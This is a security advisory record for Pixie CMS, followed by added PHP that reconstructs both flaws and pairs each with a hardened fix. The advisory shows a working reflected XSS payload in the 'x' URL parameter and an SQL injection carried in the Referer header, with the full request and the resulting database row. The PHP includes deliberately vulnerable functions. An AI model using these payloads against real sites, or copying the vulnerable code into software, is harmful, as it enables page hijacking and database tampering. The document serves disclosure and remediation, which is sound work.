{"id": "PACKETSTORM:75901", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Pixie CMS XSS / SQL Injection", "description": "", "published": "2009-03-20T00:00:00", "modified": "2009-03-20T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/75901/Pixie-CMS-XSS-SQL-Injection.html", "reporter": "Justin C. Klein Keane", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:16:53", "viewCount": 11, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "sourceHref": "https://packetstormsecurity.com/files/download/75901/pixiecms-sqlxss.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nPixie CMS Multiple Vulnerabilities \n \nPixie is a \"free, open source web application that will help you quickly \ncreate your own website. Many people refer to this type of software as \na 'content management system (cms)'\" (http://www.getpixie.co.uk). Pixie \nis written in PHP with a MySQL database back end. \n \nPixie Blog XSS \n \nIt is possible to trivially introduce a Cross Site Scripting (XSS) \nattack by tampering with blog post URL variables, specifically the \"x=\" \nvariable which is designed to contain blog posting titles. For \ninstance, on a default install of Pixie, the first blog post is \nreferenced using the URL ?s=blog&m=permalink&x=my-first-post. The \"x\" \nvariable is interpolated into the BODY tag during display on line 150 of \nindex.php: \n \n<body class=\"pixie <?php $s.\" \"; $date_array = getdate(); print \n\"y\".$date_array['year'].\" \"; print \"m\".$date_array['mon'].\" \"; print \n\"d\".$date_array['mday'].\" \"; print \"h\".$date_array['hours'].\" \"; print \n$s; ?>\"> \n \nBecause the value lands inside the double-quoted class attribute without \nany HTML escaping, a double quote in \"x\" closes that attribute and \nanything that follows is parsed as further attributes of the BODY tag, so \nby changing the \"x\" variable it is possible to inject HTML code into the \npage display. 
For instance, a Pixie blog post that was intended to be \npublished as \n \nhttp://192.168.0.67/pixie/?s=blog&m=permalink&x=my-first-post \n \ncan be altered to the form: \n \nhttp://192.168.0.67/pixie/?s=blog&m=permalink&x=\" \nonLoad=\"location.href='http://lampsecurity.org' \n \nand redirect users to the \"onLoad\" specified URL. \n \nPixie Blog SQL Injection \n \nPixie blog is vulnerable to SQL injection through the HTTP Referer \nrequest header. Referers are logged by the referral() function \n(/admin/lib/lib_logs.php line 31) without any sanitization or escaping, \nso an attacker who controls the header controls part of the INSERT \nstatement and can perform SQL Injection attacks. For example, sending \nthe request: \n \nGET http://192.168.0.67/pixie/?s=events HTTP/1.1 \nHost: 192.168.0.67 \nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) \nGecko/2009020501 Firefox/3.0.6 Paros/3.2.13 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 \nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \nKeep-Alive: 300 \nProxy-Connection: keep-alive \nReferer: http://www.lampsecurity.org/pixie/?s=about',log_id=1 on \nduplicate key update log_message='foobar \nCookie: bb2_screener_=1237492959+192.168.0.3 \n \nresults in the pixie_log table being altered, because Pixie issues the \nfollowing SQL statement: \n \ninsert into pixie_log set user_id = 'Visitor', user_ip = '192.168.0.3', \nlog_time = now(), log_type = 'referral', log_icon = 'referral', \nlog_message = 'http://www.lampsecurity.org/pixie/?s=about',log_id=1 on \nduplicate key update log_message='foobar' \n \nThe row with log_id=1 already existed, so the ON DUPLICATE KEY UPDATE \nbranch fires and only log_message is overwritten; the other columns keep \ntheir earlier values (note log_type 'system', not 'referral'): \n \nmysql> select * from pixie_log where log_id=1; \n \n+--------+---------+-------------+---------------------+----------+-------------+----------+---------------+ \n| log_id | user_id | user_ip     | log_time            | log_type | log_message | log_icon | log_important | \n+--------+---------+-------------+---------------------+----------+-------------+----------+---------------+ \n|      1 | Visitor | 192.168.0.3 | 2009-03-19 16:49:31 | system   | foobar      | error    | yes           | \n+--------+---------+-------------+---------------------+----------+-------------+----------+---------------+ \n1 row in set (0.00 sec) \n \nThis vulnerability report is also published at \nhttp://lampsecurity.org/Pixie-CMS-Multiple-Vulnerabilities. \n \n- -- \n \nJustin C. Klein Keane \nhttp://www.MadIrish.net \nhttp://LAMPSecurity.org \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (GNU/Linux) \nComment: Using GnuPG with Mandriva - http://enigmail.mozdev.org \n \niPwEAQECAAYFAknDAV8ACgkQkSlsbLsN1gAFYQcAs7xlN7Ru7oHvEzTgHnthSmFL \nLCVFV6aJUqnZvpZ6pr+45TP/Ae25g24KFnofdTSQF22AYgwYr4ucVdcWplHagdiR \nxvxm1xMf0pSA02Yg8Dch1tXiLuKyJ7qIOjrlcCLyBuVd1iAkMBk9DeGnqn8JAF5b \npfNqhrFbmAn8zKjsOVrCHwD2Y5wZzckMgm9X2CEihoxEIYxNvAbSbUhl/fNhYcUR \nIRk0fv+W6i+DiIgdxj820zkp6+wIzNMH2nxML+81QHiAgLi7jSnOWYx39entiuyf \nQGL8gm3tcVTQI56va34= \n=hOgz \n-----END PGP SIGNATURE----- \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645441432}}
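The following PHP is an added example, not Pixie's own code and not a vendor patch. It reconstructs the two sinks the advisory describes (the "x" value printed inside the BODY class attribute, and the Referer header concatenated into the pixie_log INSERT in referral()) and places a hardened form beside each. The function names, the use of mysqli with prepared statements, the slug whitelist, the column list in the INSERT and the 2048-byte length cap are all assumptions made for the example; the attacker payloads are the ones quoted in the advisory.

```php
<?php
// Added example (not Pixie's code). Reconstructs the two vulnerable sinks
// from the advisory and shows one hardened form for each. Names, the
// mysqli API choice and the column list are assumptions.

// ---- Finding 1: the "x" parameter inside class="..." on the BODY tag ----

// Vulnerable shape, reconstructed from the index.php line the advisory
// quotes: $s (built from request variables) is printed raw into a
// double-quoted attribute, so a '"' in it closes the attribute.
function body_class_vulnerable(string $s): string
{
    $d = getdate();
    return '<body class="pixie ' . $s . ' y' . $d['year'] . ' m' . $d['mon']
        . ' d' . $d['mday'] . ' h' . $d['hours'] . '">';
}

// Hardened: the value is only ever a post slug, so whitelist it to
// [A-Za-z0-9_-] (assumption about Pixie's slug alphabet) and, belt and
// braces, escape the whole class string for the attribute context.
// ENT_QUOTES turns the attacker's '"' into &quot; so it cannot break out.
function body_class_safe(string $s): string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{0,64}\z/', $s)) {
        $s = '';                       // not a slug: leave it out of the class list
    }
    $d = getdate();
    $cls = 'pixie ' . $s . ' y' . $d['year'] . ' m' . $d['mon']
         . ' d' . $d['mday'] . ' h' . $d['hours'];
    return '<body class="' . htmlspecialchars($cls, ENT_QUOTES, 'UTF-8') . '">';
}

// ---- Finding 2: the Referer header inside referral()'s INSERT ----

// Vulnerable shape: the header is concatenated into the statement. With
// the advisory's Referer (ending in ',log_id=1 on duplicate key update
// log_message='foobar) the attacker-supplied text becomes SQL and
// rewrites an existing row, exactly as the transcript shows.
function referral_vulnerable(mysqli $db, string $ip, string $referer): bool
{
    $sql = "insert into pixie_log set user_id = 'Visitor', user_ip = '$ip', "
         . "log_time = now(), log_type = 'referral', log_icon = 'referral', "
         . "log_message = '$referer'";
    return $db->query($sql) !== false;
}

// Hardened: a prepared statement carries the header as a bound value, so
// the quote and the ON DUPLICATE KEY clause are stored literally in
// log_message and never parsed as SQL. The length cap is an assumption.
function referral_safe(mysqli $db, string $ip, string $referer): bool
{
    $referer = substr($referer, 0, 2048);
    $stmt = $db->prepare(
        "insert into pixie_log (user_id, user_ip, log_time, log_type, log_icon, log_message) "
      . "values ('Visitor', ?, now(), 'referral', 'referral', ?)"
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ss', $ip, $referer);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Finding 1 can be exercised without a database, using the advisory's payload.
$payload = '" onLoad="location.href=\'http://lampsecurity.org\'';
echo body_class_vulnerable($payload), "\n";  // attribute closed, onLoad attribute injected
echo body_class_safe($payload), "\n";        // payload rejected, nothing but class="pixie  y... h..."
echo body_class_safe('my-first-post'), "\n"; // the legitimate slug still reaches the class list
```

Running this with `php example.php` prints the injected BODY tag next to the neutralised one. The `referral_*` functions need a live mysqli connection to a database with a pixie_log table and are not called here; to see the difference, send the advisory's Referer value to each and select the row with log_id=1 afterwards: the vulnerable variant overwrites it, the safe variant inserts a new row whose log_message contains the whole header, quote and all.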